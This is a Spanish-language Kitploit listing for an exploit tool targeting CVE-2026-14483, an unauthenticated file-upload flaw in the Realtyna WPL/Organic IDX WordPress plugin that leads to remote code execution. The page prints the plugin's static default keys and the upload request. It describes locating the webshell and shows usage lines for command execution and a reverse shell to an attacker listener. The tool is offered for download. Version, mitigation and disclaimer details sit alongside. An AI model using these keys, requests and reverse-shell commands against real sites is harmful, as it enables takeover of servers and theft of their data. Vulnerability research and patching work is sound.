Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14483_exploit — Exploit de subida de archivos arbitrarios sin autenticación para el plugin de WordPress Realtyna WPL/Organic IDX, encadena la subida de una webshell PHP para lograr RCE, con modos de ejecución de comandos y shell inversa. | Kitploit
Herramientas/GitHubGitHub/0xdak/cve-2026-14483_exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed Teaming
GitHub0xdak/cve-2026-14483_exploit

CVE-2026-14483_exploit

Exploit de subida de archivos arbitrarios sin autenticación para el plugin de WordPress Realtyna WPL/Organic IDX, encadena la subida de una webshell PHP para lograr RCE, con modos de ejecución de comandos y shell inversa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 17 díasAún no revisado

CVE-2026-14483 — Realtyna WPL / Organic IDX: subida arbitraria de archivos sin autenticación → RCE

Subida arbitraria de archivos sin autenticación que conduce a RCE en el plugin de WordPress Realtyna WPL / Organic IDX (real-estate-listing-realtyna-wpl ≤ 5.2.0).

El plugin registra un «servicio de E/S» en el hook público init de WordPress, accesible sin autenticación en la raíz del sitio mediante ?wplview=io&wplformat=io. La única barrera es un par de claves predeterminadas estáticas y hardcodeadas incluidas en las migraciones del plugin (idénticas en cada instalación), con io_status habilitado por defecto:

root@kitploit:~
public_key  = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
private_key = Eft76bdh0o2uyhJkbG3T

El comando set_property (libraries/io/mobile_application/set_property.php → wpl_file::upload) guarda el file[] subido con move_uploaded_file y sin comprobación de extensión/MIME, por lo que se puede colocar y ejecutar una webshell .php como el usuario web.

  • Afectados: real-estate-listing-realtyna-wpl ≤ 5.2.0
  • Corregido: 5.3.0 (se eliminó el comando vulnerable sin autenticación)
  • CWE: 434 (Subida sin restricciones de archivo con tipo peligroso)
  • Impacto: RCE sin autenticación como el usuario web (www-data)

Requisitos

Solo la biblioteca estándar de Python 3 — sin dependencias.

Uso

root@kitploit:~
# run a command and print output
python3 exploit.py http://target/ -c id

# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://target/ --shell 10.10.14.5:4444

Cómo funciona

  1. Subida — POST /?wplview=io&wplformat=io&public_key=…&private_key=…&cmd=set_property&commands_directory=mobile_application&user_id=1 con un file[] multipart denominado image_<name>.php. El prefijo image_ se elimina, por lo que el archivo se guarda como <name>.php.
  2. Localización — la webshell aterriza en wp-content/uploads/WPL/<pid>/<name>.php, donde <pid> es el id de la propiedad creada por la petición (la respuesta no lo refleja). La herramienta enumera ids de propiedad pequeños para encontrar la shell.
  3. Ejecución — accede a …/<name>.php?c=<cmd>.

Identificar un objetivo

Un sitio WordPress con el plugin real-estate-listing-realtyna-wpl ≤ 5.2.0 activo. El endpoint responde en GET /?wplview=io&wplformat=io (el servicio de E/S del plugin).

Mitigación

Actualiza el plugin a ≥ 5.3.0, valida las extensiones/MIME de las subidas, nunca ejecutes PHP desde wp-content/uploads y rota las claves estáticas de E/S predeterminadas del plugin.

Aviso legal

Solo para pruebas de seguridad autorizadas y con fines educativos. Úsalo únicamente contra sistemas que poseas o para los que tengas permiso explícito para realizar pruebas.

Descargar herramienta